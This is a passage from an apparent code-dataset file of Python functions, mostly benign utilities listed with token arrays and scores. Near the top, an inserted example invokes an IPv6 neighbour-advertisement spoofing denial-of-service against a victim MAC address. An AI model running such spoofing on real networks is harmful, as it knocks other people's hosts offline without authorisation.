0.03389830508474576,
0,
0.03225806451612903,
0,
0.16666666666666666,
0.13333333333333333,
0.07142857142857142,
0.07352941176470588,
0.22727272727272727
] |
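A hypothetical invocation, reusing the example values that already appear in the docstring (requires the usual Scapy privileges to sniff and send):

# Limit the DoS to NS messages from one victim mac and advertise
# ourselves as a router (sets the 'R' flag in the spoofed NA).
NDP_Attack_NA_Spoofing(iface="eth0",
                       mac_src_filter="00:13:72:8c:b5:69",
                       router=True)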
def distance_calc(s1, s2):
"""
Calculate Levenshtein distance between two words.
:param s1: first word
:type s1 : str
:param s2: second word
:type s2 : str
:return: distance between two words
References:
1- https://stackoverflow.com/questions/2460177/edit-distance-in-python
2- https://en.wikipedia.org/wiki/Levenshtein_distance
"""
if len(s1) > len(s2):
s1, s2 = s2, s1
distances = range(len(s1) + 1)
for i2, c2 in enumerate(s2):
distances_ = [i2 + 1]
for i1, c1 in enumerate(s1):
if c1 == c2:
distances_.append(distances[i1])
else:
distances_.append(
1 + min((distances[i1], distances[i1 + 1], distances_[-1])))
distances = distances_
return distances[-1] | [
"def",
"distance_calc",
"(",
"s1",
",",
"s2",
")",
":",
"if",
"len",
"(",
"s1",
")",
">",
"len",
"(",
"s2",
")",
":",
"s1",
",",
"s2",
"=",
"s2",
",",
"s1",
"distances",
"=",
"range",
"(",
"len",
"(",
"s1",
")",
"+",
"1",
")",
"for",
"i2",
",",
"c2",
"in",
"enumerate",
"(",
"s2",
")",
":",
"distances_",
"=",
"[",
"i2",
"+",
"1",
"]",
"for",
"i1",
",",
"c1",
"in",
"enumerate",
"(",
"s1",
")",
":",
"if",
"c1",
"==",
"c2",
":",
"distances_",
".",
"append",
"(",
"distances",
"[",
"i1",
"]",
")",
"else",
":",
"distances_",
".",
"append",
"(",
"1",
"+",
"min",
"(",
"(",
"distances",
"[",
"i1",
"]",
",",
"distances",
"[",
"i1",
"+",
"1",
"]",
",",
"distances_",
"[",
"-",
"1",
"]",
")",
")",
")",
"distances",
"=",
"distances_",
"return",
"distances",
"[",
"-",
"1",
"]"
] | 28.607143 | [
0.038461538461538464,
0.2857142857142857,
0.03773584905660377,
0,
0.12,
0.2222222222222222,
0.11538461538461539,
0.2222222222222222,
0.07894736842105263,
0,
0.1875,
0.05405405405405406,
0.07017543859649122,
0.2857142857142857,
0.08,
0.08695652173913043,
0,
0.058823529411764705,
0.0625,
0.06896551724137931,
0.05555555555555555,
0.08333333333333333,
0.041666666666666664,
0.11764705882352941,
0.08823529411764706,
0.05,
0.06666666666666667,
0.08333333333333333
] |
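A quick sanity check against the textbook example:

# "kitten" -> "sitting" takes 3 edits: k->s, e->i, and appending g.
assert distance_calc("kitten", "sitting") == 3
assert distance_calc("", "abc") == 3      # pure insertions
assert distance_calc("abc", "abc") == 0   # identical words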
def items(self):
"""Return all of the rows that are in the result set.
:rtype: list
"""
if not self.cursor.rowcount:
return []
self.cursor.scroll(0, 'absolute')
return self.cursor.fetchall() | [
"def",
"items",
"(",
"self",
")",
":",
"if",
"not",
"self",
".",
"cursor",
".",
"rowcount",
":",
"return",
"[",
"]",
"self",
".",
"cursor",
".",
"scroll",
"(",
"0",
",",
"'absolute'",
")",
"return",
"self",
".",
"cursor",
".",
"fetchall",
"(",
")"
] | 22.090909 | [
0.0625,
0.03278688524590164,
0,
0.15,
0,
0.18181818181818182,
0.05555555555555555,
0.09523809523809523,
0,
0.04878048780487805,
0.05405405405405406
] |
def eval(self, operator, simulator=None):
"""Load all operands and process them by self._evalFn"""
def getVal(v):
while not isinstance(v, Value):
v = v._val
return v
operands = list(map(getVal, operator.operands))
if isEventDependentOp(operator.operator):
operands.append(simulator.now)
elif operator.operator == AllOps.IntToBits:
operands.append(operator.result._dtype)
return self._evalFn(*operands) | [
"def",
"eval",
"(",
"self",
",",
"operator",
",",
"simulator",
"=",
"None",
")",
":",
"def",
"getVal",
"(",
"v",
")",
":",
"while",
"not",
"isinstance",
"(",
"v",
",",
"Value",
")",
":",
"v",
"=",
"v",
".",
"_val",
"return",
"v",
"operands",
"=",
"list",
"(",
"map",
"(",
"getVal",
",",
"operator",
".",
"operands",
")",
")",
"if",
"isEventDependentOp",
"(",
"operator",
".",
"operator",
")",
":",
"operands",
".",
"append",
"(",
"simulator",
".",
"now",
")",
"elif",
"operator",
".",
"operator",
"==",
"AllOps",
".",
"IntToBits",
":",
"operands",
".",
"append",
"(",
"operator",
".",
"result",
".",
"_dtype",
")",
"return",
"self",
".",
"_evalFn",
"(",
"*",
"operands",
")"
] | 31.375 | [
0.024390243902439025,
0.03125,
0.09090909090909091,
0.046511627906976744,
0.07692307692307693,
0,
0.1,
0,
0.03636363636363636,
0,
0.04081632653061224,
0.047619047619047616,
0.0392156862745098,
0.0392156862745098,
0,
0.05263157894736842
] |
def require_option(current_ctx: click.Context, param_name: str) -> None:
"""Throw an exception if an option wasn't required. This is useful when its
optional in some contexts but required for a subcommand"""
ctx = current_ctx
param_definition = None
while ctx is not None:
# ctx.command.params has the actual definition of the param. We use
# this when raising the exception.
param_definition = next(
(p for p in ctx.command.params if p.name == param_name), None
)
# ctx.params has the current value of the parameter, as set by the user.
if ctx.params.get(param_name):
return
ctx = ctx.parent
assert param_definition, f"unknown parameter {param_name}"
raise click.MissingParameter(ctx=current_ctx, param=param_definition) | [
"def",
"require_option",
"(",
"current_ctx",
":",
"click",
".",
"Context",
",",
"param_name",
":",
"str",
")",
"->",
"None",
":",
"ctx",
"=",
"current_ctx",
"param_definition",
"=",
"None",
"while",
"ctx",
"is",
"not",
"None",
":",
"# ctx.command.params has the actual definition of the param. We use",
"# this when raising the exception.",
"param_definition",
"=",
"next",
"(",
"(",
"p",
"for",
"p",
"in",
"ctx",
".",
"command",
".",
"params",
"if",
"p",
".",
"name",
"==",
"param_name",
")",
",",
"None",
")",
"# ctx.params has the current value of the parameter, as set by the user.",
"if",
"ctx",
".",
"params",
".",
"get",
"(",
"param_name",
")",
":",
"return",
"ctx",
"=",
"ctx",
".",
"parent",
"assert",
"param_definition",
",",
"f\"unknown parameter {param_name}\"",
"raise",
"click",
".",
"MissingParameter",
"(",
"ctx",
"=",
"current_ctx",
",",
"param",
"=",
"param_definition",
")"
] | 40.65 | [
0.013888888888888888,
0.02531645569620253,
0.04838709677419355,
0,
0.09523809523809523,
0.07407407407407407,
0.07692307692307693,
0.02666666666666667,
0.047619047619047616,
0.09375,
0.0273972602739726,
0.3333333333333333,
0,
0.0375,
0.05263157894736842,
0.1111111111111111,
0.08333333333333333,
0,
0.03225806451612903,
0.0273972602739726
] |
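A minimal click sketch of the pattern the docstring describes; the group, option, and subcommand names are illustrative:

import click

@click.group()
@click.option("--profile", default=None, help="Optional for most commands.")
def cli(profile):
    pass

@cli.command()
@click.pass_context
def deploy(ctx):
    # Optional elsewhere, but mandatory here: walks up the context chain
    # and raises MissingParameter if --profile was never supplied.
    require_option(ctx, "profile")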
def get_channel_listing(self):
"""
serialized form for channel listing
"""
return {'name': self.name,
'key': self.channel.key,
'type': self.channel.typ,
'read_only': self.read_only,
'is_online': self.is_online(),
'actions': self.get_actions(),
'unread': self.unread_count()} | [
"def",
"get_channel_listing",
"(",
"self",
")",
":",
"return",
"{",
"'name'",
":",
"self",
".",
"name",
",",
"'key'",
":",
"self",
".",
"channel",
".",
"key",
",",
"'type'",
":",
"self",
".",
"channel",
".",
"typ",
",",
"'read_only'",
":",
"self",
".",
"read_only",
",",
"'is_online'",
":",
"self",
".",
"is_online",
"(",
")",
",",
"'actions'",
":",
"self",
".",
"get_actions",
"(",
")",
",",
"'unread'",
":",
"self",
".",
"unread_count",
"(",
")",
"}"
] | 32.666667 | [
0.03333333333333333,
0.18181818181818182,
0.046511627906976744,
0,
0.18181818181818182,
0.08823529411764706,
0.05,
0.04878048780487805,
0.045454545454545456,
0.043478260869565216,
0.043478260869565216,
0.06521739130434782
] |
def sil(msg, version):
"""Calculate SIL, Surveillance Integrity Level
Args:
msg (string): 28 bytes hexadecimal message string with TC = 29, 31
Returns:
int or string: Probability of exceeding Horizontal Radius of Containment RCu
int or string: Probability of exceeding Vertical Integrity Containment Region VPL
string: SIL supplement based on per "hour" or "sample", or 'unknown'
"""
tc = typecode(msg)
if tc not in [29, 31]:
raise RuntimeError("%s: Not a target state and status message, \
or operation status message, expecting TC = 29 or 31" % msg)
msgbin = common.hex2bin(msg)
if tc == 29:
SIL = common.bin2int(msgbin[76:78])
elif tc == 31:
SIL = common.bin2int(msgbin[82:84])
try:
PE_RCu = uncertainty.SIL[SIL]['PE_RCu']
PE_VPL = uncertainty.SIL[SIL]['PE_VPL']
except KeyError:
PE_RCu, PE_VPL = uncertainty.NA, uncertainty.NA
base = 'unknown'
if version == 2:
if tc == 29:
SIL_SUP = common.bin2int(msgbin[39])
elif tc == 31:
SIL_SUP = common.bin2int(msgbin[86])
if SIL_SUP == 0:
base = "hour"
elif SIL_SUP == 1:
base = "sample"
return PE_RCu, PE_VPL, base | [
"def",
"sil",
"(",
"msg",
",",
"version",
")",
":",
"tc",
"=",
"typecode",
"(",
"msg",
")",
"if",
"tc",
"not",
"in",
"[",
"29",
",",
"31",
"]",
":",
"raise",
"RuntimeError",
"(",
"\"%s: Not a target state and status messag, \\\n or operation status message, expecting TC = 29 or 31\"",
"%",
"msg",
")",
"msgbin",
"=",
"common",
".",
"hex2bin",
"(",
"msg",
")",
"if",
"tc",
"==",
"29",
":",
"SIL",
"=",
"common",
".",
"bin2int",
"(",
"msgbin",
"[",
"76",
":",
"78",
"]",
")",
"elif",
"tc",
"==",
"31",
":",
"SIL",
"=",
"common",
".",
"bin2int",
"(",
"msgbin",
"[",
"82",
":",
"84",
"]",
")",
"try",
":",
"PE_RCu",
"=",
"uncertainty",
".",
"SIL",
"[",
"SIL",
"]",
"[",
"'PE_RCu'",
"]",
"PE_VPL",
"=",
"uncertainty",
".",
"SIL",
"[",
"SIL",
"]",
"[",
"'PE_VPL'",
"]",
"except",
"KeyError",
":",
"PE_RCu",
",",
"PE_VPL",
"=",
"uncertainty",
".",
"NA",
",",
"uncertainty",
".",
"NA",
"base",
"=",
"'unknown'",
"if",
"version",
"==",
"2",
":",
"if",
"tc",
"==",
"29",
":",
"SIL_SUP",
"=",
"common",
".",
"bin2int",
"(",
"msgbin",
"[",
"39",
"]",
")",
"elif",
"tc",
"==",
"31",
":",
"SIL_SUP",
"=",
"common",
".",
"bin2int",
"(",
"msgbin",
"[",
"86",
"]",
")",
"if",
"SIL_SUP",
"==",
"0",
":",
"base",
"=",
"\"hour\"",
"elif",
"SIL_SUP",
"==",
"1",
":",
"base",
"=",
"\"sample\"",
"return",
"PE_RCu",
",",
"PE_VPL",
",",
"base"
] | 28.840909 | [
0.045454545454545456,
0.04,
0,
0.2222222222222222,
0.04054054054054054,
0,
0.16666666666666666,
0.03571428571428571,
0.033707865168539325,
0.02631578947368421,
0.2857142857142857,
0.09090909090909091,
0,
0.07692307692307693,
0.056338028169014086,
0.05747126436781609,
0,
0.0625,
0,
0.125,
0.046511627906976744,
0.1111111111111111,
0.046511627906976744,
0,
0.25,
0.0425531914893617,
0.0425531914893617,
0.1,
0.03636363636363636,
0,
0.1,
0,
0.1,
0.1,
0.041666666666666664,
0.09090909090909091,
0.041666666666666664,
0,
0.08333333333333333,
0.08,
0.07692307692307693,
0.07407407407407407,
0,
0.06451612903225806
] |
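Call shape only -- a real 28-character hexadecimal ADS-B message with typecode 29 or 31 is required, so the message below is a placeholder, not a decodable frame:

msg = "<28-hex-char TC=31 message>"  # placeholder value
PE_RCu, PE_VPL, base = sil(msg, version=2)
print(PE_RCu, PE_VPL, base)  # exceedance probabilities plus "hour"/"sample"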
def _score(estimator, Z_test, scorer):
"""Compute the score of an estimator on a given test set."""
score = scorer(estimator, Z_test)
if not isinstance(score, numbers.Number):
raise ValueError("scoring must return a number, got %s (%s) instead."
% (str(score), type(score)))
return score | [
"def",
"_score",
"(",
"estimator",
",",
"Z_test",
",",
"scorer",
")",
":",
"score",
"=",
"scorer",
"(",
"estimator",
",",
"Z_test",
")",
"if",
"not",
"isinstance",
"(",
"score",
",",
"numbers",
".",
"Number",
")",
":",
"raise",
"ValueError",
"(",
"\"scoring must return a number, got %s (%s) instead.\"",
"%",
"(",
"str",
"(",
"score",
")",
",",
"type",
"(",
"score",
")",
")",
")",
"return",
"score"
] | 47.142857 | [
0.02631578947368421,
0.03125,
0.05405405405405406,
0.044444444444444446,
0.03896103896103896,
0.07547169811320754,
0.125
] |
def parameters(self):
""" returns the default parameters """
if self._parameters is None:
self.__init()
for param in self._parameters:
if not isinstance(param['defaultValue'], BaseGPObject):
if param['dataType'] == "GPFeatureRecordSetLayer":
param['defaultValue'] = GPFeatureRecordSetLayer.fromJSON(json.dumps(param))
elif param['dataType'] == "GPString":
param['defaultValue'] = GPString.fromJSON(json.dumps(param))
elif param['dataType'] == "GPLong":
param['defaultValue'] = GPLong.fromJSON(json.dumps(param))
elif param['dataType'] == "GPDouble":
param['defaultValue'] = GPDouble.fromJSON(json.dumps(param))
elif param['dataType'] == "GPDate":
param['defaultValue'] = GPDate.fromJSON(json.dumps(param))
elif param['dataType'] == "GPBoolean":
param['defaultValue'] = GPBoolean.fromJSON(json.dumps(param))
elif param['dataType'] == "GPDataFile":
param['defaultValue'] = GPDataFile.fromJSON(json.dumps(param))
elif param['dataType'] == "GPLinearUnit":
param['defaultValue'] = GPLinearUnit.fromJSON(json.dumps(param))
elif param['dataType'] == "GPMultiValue":
param['defaultValue'] = GPMultiValue.fromJSON(json.dumps(param))
elif param['dataType'] == "GPRasterData":
param['defaultValue'] = GPRasterData.fromJSON(json.dumps(param))
elif param['dataType'] == "GPRasterDataLayer":
param['defaultValue'] = GPRasterDataLayer.fromJSON(json.dumps(param))
elif param['dataType'] == "GPRecordSet":
param['defaultValue'] = GPRecordSet.fromJSON(json.dumps(param))
return self._parameters | [
"def",
"parameters",
"(",
"self",
")",
":",
"if",
"self",
".",
"_parameters",
"is",
"None",
":",
"self",
".",
"__init",
"(",
")",
"for",
"param",
"in",
"self",
".",
"_parameters",
":",
"if",
"not",
"isinstance",
"(",
"param",
"[",
"'defaultValue'",
"]",
",",
"BaseGPObject",
")",
":",
"if",
"param",
"[",
"'dataType'",
"]",
"==",
"\"GPFeatureRecordSetLayer\"",
":",
"param",
"[",
"'defaultValue'",
"]",
"=",
"GPFeatureRecordSetLayer",
".",
"fromJSON",
"(",
"json",
".",
"dumps",
"(",
"param",
")",
")",
"elif",
"param",
"[",
"'dataType'",
"]",
"==",
"\"GPString\"",
":",
"param",
"[",
"'defaultValue'",
"]",
"=",
"GPString",
".",
"fromJSON",
"(",
"json",
".",
"dumps",
"(",
"param",
")",
")",
"elif",
"param",
"[",
"'dataType'",
"]",
"==",
"\"GPLong\"",
":",
"param",
"[",
"'defaultValue'",
"]",
"=",
"GPLong",
".",
"fromJSON",
"(",
"json",
".",
"dumps",
"(",
"param",
")",
")",
"elif",
"param",
"[",
"'dataType'",
"]",
"==",
"\"GPDouble\"",
":",
"param",
"[",
"'defaultValue'",
"]",
"=",
"GPDouble",
".",
"fromJSON",
"(",
"json",
".",
"dumps",
"(",
"param",
")",
")",
"elif",
"param",
"[",
"'dataType'",
"]",
"==",
"\"GPDate\"",
":",
"param",
"[",
"'defaultValue'",
"]",
"=",
"GPDate",
".",
"fromJSON",
"(",
"json",
".",
"dumps",
"(",
"param",
")",
")",
"elif",
"param",
"[",
"'dataType'",
"]",
"==",
"\"GPBoolean\"",
":",
"param",
"[",
"'defaultValue'",
"]",
"=",
"GPBoolean",
".",
"fromJSON",
"(",
"json",
".",
"dumps",
"(",
"param",
")",
")",
"elif",
"param",
"[",
"'dataType'",
"]",
"==",
"\"GPDataFile\"",
":",
"param",
"[",
"'defaultValue'",
"]",
"=",
"GPDataFile",
".",
"fromJSON",
"(",
"json",
".",
"dumps",
"(",
"param",
")",
")",
"elif",
"param",
"[",
"'dataType'",
"]",
"==",
"\"GPLinearUnit\"",
":",
"param",
"[",
"'defaultValue'",
"]",
"=",
"GPLinearUnit",
".",
"fromJSON",
"(",
"json",
".",
"dumps",
"(",
"param",
")",
")",
"elif",
"param",
"[",
"'dataType'",
"]",
"==",
"\"GPMultiValue\"",
":",
"param",
"[",
"'defaultValue'",
"]",
"=",
"GPMultiValue",
".",
"fromJSON",
"(",
"json",
".",
"dumps",
"(",
"param",
")",
")",
"elif",
"param",
"[",
"'dataType'",
"]",
"==",
"\"GPRasterData\"",
":",
"param",
"[",
"'defaultValue'",
"]",
"=",
"GPRasterData",
".",
"fromJSON",
"(",
"json",
".",
"dumps",
"(",
"param",
")",
")",
"elif",
"param",
"[",
"'dataType'",
"]",
"==",
"\"GPRasterDataLayer\"",
":",
"param",
"[",
"'defaultValue'",
"]",
"=",
"GPRasterDataLayer",
".",
"fromJSON",
"(",
"json",
".",
"dumps",
"(",
"param",
")",
")",
"elif",
"param",
"[",
"'dataType'",
"]",
"==",
"\"GPRecordSet\"",
":",
"param",
"[",
"'defaultValue'",
"]",
"=",
"GPRecordSet",
".",
"fromJSON",
"(",
"json",
".",
"dumps",
"(",
"param",
")",
")",
"return",
"self",
".",
"_parameters"
] | 62.387097 | [
0.047619047619047616,
0.043478260869565216,
0.05555555555555555,
0.08,
0.05263157894736842,
0.029850746268656716,
0.030303030303030304,
0.031578947368421054,
0.03773584905660377,
0.0375,
0.0392156862745098,
0.02564102564102564,
0.03773584905660377,
0.0375,
0.0392156862745098,
0.02564102564102564,
0.037037037037037035,
0.037037037037037035,
0.03636363636363636,
0.036585365853658534,
0.03508771929824561,
0.03571428571428571,
0.03508771929824561,
0.03571428571428571,
0.03508771929824561,
0.03571428571428571,
0.03225806451612903,
0.033707865168539325,
0.03571428571428571,
0.03614457831325301,
0.06451612903225806
] |
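The elif ladder above only maps a dataType string to the matching GP* class; an equivalent (untested) dispatch-table sketch, assuming the same classes are importable in this scope:

_GP_TYPES = {
    "GPFeatureRecordSetLayer": GPFeatureRecordSetLayer,
    "GPString": GPString,
    "GPLong": GPLong,
    "GPDouble": GPDouble,
    "GPDate": GPDate,
    "GPBoolean": GPBoolean,
    "GPDataFile": GPDataFile,
    "GPLinearUnit": GPLinearUnit,
    "GPMultiValue": GPMultiValue,
    "GPRasterData": GPRasterData,
    "GPRasterDataLayer": GPRasterDataLayer,
    "GPRecordSet": GPRecordSet,
}

cls = _GP_TYPES.get(param['dataType'])
if cls is not None:
    param['defaultValue'] = cls.fromJSON(json.dumps(param))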
def deserialize(obj):
"""Convert JSON dicts back into objects."""
# Be careful of shallow copy here
target = dict(obj)
class_name = None
if '__class__' in target:
class_name = target.pop('__class__')
if '__module__' in obj:
obj.pop('__module__')
# Use getattr(module, class_name) for custom types if needed
if class_name == 'datetime':
return datetime.datetime(tzinfo=utc, **target)
if class_name == 'StreamingBody':
return StringIO(target['body'])
# Return unrecognized structures as-is
return obj | [
"def",
"deserialize",
"(",
"obj",
")",
":",
"# Be careful of shallow copy here",
"target",
"=",
"dict",
"(",
"obj",
")",
"class_name",
"=",
"None",
"if",
"'__class__'",
"in",
"target",
":",
"class_name",
"=",
"target",
".",
"pop",
"(",
"'__class__'",
")",
"if",
"'__module__'",
"in",
"obj",
":",
"obj",
".",
"pop",
"(",
"'__module__'",
")",
"# Use getattr(module, class_name) for custom types if needed",
"if",
"class_name",
"==",
"'datetime'",
":",
"return",
"datetime",
".",
"datetime",
"(",
"tzinfo",
"=",
"utc",
",",
"*",
"*",
"target",
")",
"if",
"class_name",
"==",
"'StreamingBody'",
":",
"return",
"StringIO",
"(",
"target",
"[",
"'body'",
"]",
")",
"# Return unrecognized structures as-is",
"return",
"obj"
] | 34.9375 | [
0.047619047619047616,
0.0425531914893617,
0.05405405405405406,
0.09090909090909091,
0.09523809523809523,
0.06896551724137931,
0.045454545454545456,
0.07407407407407407,
0.06896551724137931,
0.03125,
0.0625,
0.037037037037037035,
0.05405405405405406,
0.05128205128205128,
0.047619047619047616,
0.14285714285714285
] |
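deserialize has the shape of a json.loads object hook; a typical use (assuming the module-level utc tzinfo the function references) might be:

import json

payload = '{"__class__": "datetime", "year": 2019, "month": 1, "day": 2}'
value = json.loads(payload, object_hook=deserialize)
# -> datetime.datetime(2019, 1, 2, 0, 0, tzinfo=utc)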
def open(self, mode='r', buffering=-1, encoding=None,
errors=None, newline=None):
"""Open the file pointed by this path and return a fake file object.
Raises:
IOError: if the target object is a directory, the path is invalid
or permission is denied.
"""
if self._closed:
self._raise_closed()
return FakeFileOpen(self.filesystem, use_io=True)(
self._path(), mode, buffering, encoding, errors, newline) | [
"def",
"open",
"(",
"self",
",",
"mode",
"=",
"'r'",
",",
"buffering",
"=",
"-",
"1",
",",
"encoding",
"=",
"None",
",",
"errors",
"=",
"None",
",",
"newline",
"=",
"None",
")",
":",
"if",
"self",
".",
"_closed",
":",
"self",
".",
"_raise_closed",
"(",
")",
"return",
"FakeFileOpen",
"(",
"self",
".",
"filesystem",
",",
"use_io",
"=",
"True",
")",
"(",
"self",
".",
"_path",
"(",
")",
",",
"mode",
",",
"buffering",
",",
"encoding",
",",
"errors",
",",
"newline",
")"
] | 41.25 | [
0.03773584905660377,
0.15,
0.02631578947368421,
0,
0.13333333333333333,
0.025974025974025976,
0.05,
0.18181818181818182,
0.08333333333333333,
0.0625,
0.05172413793103448,
0.043478260869565216
] |
def generate_states(state_count, process_matrix, process_covariance,
initial_state=None):
"""
Generate states by simulating a linear system with constant process matrix
and process noise covariance.
Args:
state_count (int): Number of states to generate.
process_matrix (array): Square array
process_covariance (array): Square array specifying process noise
covariance.
initial_state (array or None): If omitted, use zero-filled vector as
initial state.
"""
# Sanitise input
process_matrix = np.atleast_2d(process_matrix)
process_covariance = np.atleast_2d(process_covariance)
state_dim = process_matrix.shape[0]
if process_matrix.shape != (state_dim, state_dim):
raise ValueError("Process matrix has inconsistent shape: {}".format(
process_matrix.shape))
if process_covariance.shape != (state_dim, state_dim):
raise ValueError("Process covariance has inconsistent shape: {}".format(
process_covariance.shape))
if initial_state is None:
initial_state = np.zeros(process_matrix.shape[0])
states = [initial_state]
while len(states) < state_count:
states.append(
process_matrix.dot(states[-1]) + np.random.multivariate_normal(
mean=np.zeros(state_dim), cov=process_covariance
)
)
return np.vstack(states) | [
"def",
"generate_states",
"(",
"state_count",
",",
"process_matrix",
",",
"process_covariance",
",",
"initial_state",
"=",
"None",
")",
":",
"# Sanitise input",
"process_matrix",
"=",
"np",
".",
"atleast_2d",
"(",
"process_matrix",
")",
"process_covariance",
"=",
"np",
".",
"atleast_2d",
"(",
"process_covariance",
")",
"state_dim",
"=",
"process_matrix",
".",
"shape",
"[",
"0",
"]",
"if",
"process_matrix",
".",
"shape",
"!=",
"(",
"state_dim",
",",
"state_dim",
")",
":",
"raise",
"ValueError",
"(",
"\"Process matrix has inconsistent shape: {}\"",
".",
"format",
"(",
"process_matrix",
".",
"shape",
")",
")",
"if",
"process_covariance",
".",
"shape",
"!=",
"(",
"state_dim",
",",
"state_dim",
")",
":",
"raise",
"ValueError",
"(",
"\"Process covariance has inconsistent shape: {}\"",
".",
"format",
"(",
"process_covariance",
".",
"shape",
")",
")",
"if",
"initial_state",
"is",
"None",
":",
"initial_state",
"=",
"np",
".",
"zeros",
"(",
"process_matrix",
".",
"shape",
"[",
"0",
"]",
")",
"states",
"=",
"[",
"initial_state",
"]",
"while",
"len",
"(",
"states",
")",
"<",
"state_count",
":",
"states",
".",
"append",
"(",
"process_matrix",
".",
"dot",
"(",
"states",
"[",
"-",
"1",
"]",
")",
"+",
"np",
".",
"random",
".",
"multivariate_normal",
"(",
"mean",
"=",
"np",
".",
"zeros",
"(",
"state_dim",
")",
",",
"cov",
"=",
"process_covariance",
")",
")",
"return",
"np",
".",
"vstack",
"(",
"states",
")"
] | 35.2 | [
0.029411764705882353,
0.1,
0.2857142857142857,
0.02564102564102564,
0.06060606060606061,
0,
0.2222222222222222,
0.05357142857142857,
0.06818181818181818,
0.0410958904109589,
0.08695652173913043,
0.039473684210526314,
0.07692307692307693,
0,
0.2857142857142857,
0.1,
0.04,
0.034482758620689655,
0.05128205128205128,
0,
0.037037037037037035,
0.039473684210526314,
0.08823529411764706,
0,
0.034482758620689655,
0.05,
0.07894736842105263,
0,
0.06896551724137931,
0.03508771929824561,
0,
0.07142857142857142,
0.05555555555555555,
0.13636363636363635,
0.04,
0.0625,
0.23076923076923078,
0.3333333333333333,
0,
0.07142857142857142
] |
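A small constant-velocity sketch of generate_states: the state is (position, velocity), velocity carries forward, and both components pick up a little process noise each step.

import numpy as np

F = np.array([[1.0, 1.0],
              [0.0, 1.0]])      # position += velocity each step
Q = np.diag([1e-4, 1e-4])       # small process noise covariance
states = generate_states(50, F, Q, initial_state=np.array([0.0, 1.0]))
print(states.shape)             # (50, 2)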
def fix_deplist(deps):
""" Turn a dependency list into lowercase, and make sure all entries
that are just a string become a tuple of strings
"""
deps = [
((dep.lower(),)
if not isinstance(dep, (list, tuple))
else tuple([dep_entry.lower()
for dep_entry in dep
]))
for dep in deps
]
return deps | [
"def",
"fix_deplist",
"(",
"deps",
")",
":",
"deps",
"=",
"[",
"(",
"(",
"dep",
".",
"lower",
"(",
")",
",",
")",
"if",
"not",
"isinstance",
"(",
"dep",
",",
"(",
"list",
",",
"tuple",
")",
")",
"else",
"tuple",
"(",
"[",
"dep_entry",
".",
"lower",
"(",
")",
"for",
"dep_entry",
"in",
"dep",
"]",
")",
")",
"for",
"dep",
"in",
"deps",
"]",
"return",
"deps"
] | 29.461538 | [
0.045454545454545456,
0.027777777777777776,
0.03571428571428571,
0.2857142857142857,
0.25,
0.13043478260869565,
0.06521739130434782,
0.10526315789473684,
0.07317073170731707,
0.13043478260869565,
0.08695652173913043,
0.6,
0.13333333333333333
] |
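For example, mixed string and tuple entries normalize like this:

deps = ["Flask", ("Pillow", "PIL"), "requests"]
print(fix_deplist(deps))
# [('flask',), ('pillow', 'pil'), ('requests',)]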
def get_connection(self, host, port):
"""
Returns a ``StrictRedis`` connection instance.
"""
return beanstalkc.Connection(
host=host,
port=port
) | [
"def",
"get_connection",
"(",
"self",
",",
"host",
",",
"port",
")",
":",
"return",
"beanstalkc",
".",
"Connection",
"(",
"host",
"=",
"host",
",",
"port",
"=",
"port",
")"
] | 25.25 | [
0.02702702702702703,
0.18181818181818182,
0.05555555555555555,
0.18181818181818182,
0.08108108108108109,
0.13636363636363635,
0.14285714285714285,
0.3333333333333333
] |
def magnitude(self):
"""
Length/norm/magnitude of vector representation of document.
This is usually denoted by ||d||.
"""
return math.sqrt(sum(t**2 for t in self._terms.values())) | [
"def",
"magnitude",
"(",
"self",
")",
":",
"return",
"math",
".",
"sqrt",
"(",
"sum",
"(",
"t",
"**",
"2",
"for",
"t",
"in",
"self",
".",
"_terms",
".",
"values",
"(",
")",
")",
")"
] | 35.833333 | [
0.05,
0.18181818181818182,
0.029850746268656716,
0.0975609756097561,
0.18181818181818182,
0.03076923076923077
] |
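A worked example of the norm: a document whose only term weights are 3 and 4 has magnitude sqrt(3**2 + 4**2) = 5 (the _terms mapping below is hypothetical):

import math

terms = {"cat": 3, "dog": 4}
norm = math.sqrt(sum(t**2 for t in terms.values()))
assert norm == 5.0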
def register_range_type(pgrange, pyrange, conn):
"""
Register a new range type as a PostgreSQL range.
>>> register_range_type("int4range", intrange, conn)
The above will make sure intrange is regarded as an int4range for queries
and that int4ranges will be cast into intrange when fetching rows.
pgrange should be the full name including schema for the custom range type.
Note that adaption is global, meaning if a range type is passed to a regular
psycopg2 connection it will adapt it to its proper range type. Parsing of
rows from the database however is not global and just set on a per connection
basis.
"""
register_adapter(pyrange, partial(adapt_range, pgrange))
register_range_caster(
pgrange, pyrange, *query_range_oids(pgrange, conn), scope=conn) | [
"def",
"register_range_type",
"(",
"pgrange",
",",
"pyrange",
",",
"conn",
")",
":",
"register_adapter",
"(",
"pyrange",
",",
"partial",
"(",
"adapt_range",
",",
"pgrange",
")",
")",
"register_range_caster",
"(",
"pgrange",
",",
"pyrange",
",",
"*",
"query_range_oids",
"(",
"pgrange",
",",
"conn",
")",
",",
"scope",
"=",
"conn",
")"
] | 40.25 | [
0.020833333333333332,
0.2857142857142857,
0.038461538461538464,
0,
0.05,
0,
0.025974025974025976,
0.02857142857142857,
0,
0.02531645569620253,
0,
0.0375,
0.025974025974025976,
0.037037037037037035,
0.2,
0.2857142857142857,
0,
0.03333333333333333,
0.11538461538461539,
0.056338028169014086
] |
def get_rule_table(rules):
"""Formats output from get_all_rules and returns a table. """
table = formatting.Table(['Id', 'KeyName'], "Rules")
for rule in rules:
table.add_row([rule['id'], rule['keyName']])
return table | [
"def",
"get_rule_table",
"(",
"rules",
")",
":",
"table",
"=",
"formatting",
".",
"Table",
"(",
"[",
"'Id'",
",",
"'KeyName'",
"]",
",",
"\"Rules\"",
")",
"for",
"rule",
"in",
"rules",
":",
"table",
".",
"add_row",
"(",
"[",
"rule",
"[",
"'id'",
"]",
",",
"rule",
"[",
"'keyName'",
"]",
"]",
")",
"return",
"table"
] | 39.5 | [
0.038461538461538464,
0.03076923076923077,
0.03571428571428571,
0.09090909090909091,
0.038461538461538464,
0.125
] |
def _get_graph(graph, filename):
"""Retrieve or render a graph."""
try:
rendered = graph.rendered_file
except AttributeError:
try:
graph.render(os.path.join(server.tmpdir, filename), format='png')
rendered = filename
except OSError:
rendered = None
graph.rendered_file = rendered
return rendered | [
"def",
"_get_graph",
"(",
"graph",
",",
"filename",
")",
":",
"try",
":",
"rendered",
"=",
"graph",
".",
"rendered_file",
"except",
"AttributeError",
":",
"try",
":",
"graph",
".",
"render",
"(",
"os",
".",
"path",
".",
"join",
"(",
"server",
".",
"tmpdir",
",",
"filename",
")",
",",
"format",
"=",
"'png'",
")",
"rendered",
"=",
"filename",
"except",
"OSError",
":",
"rendered",
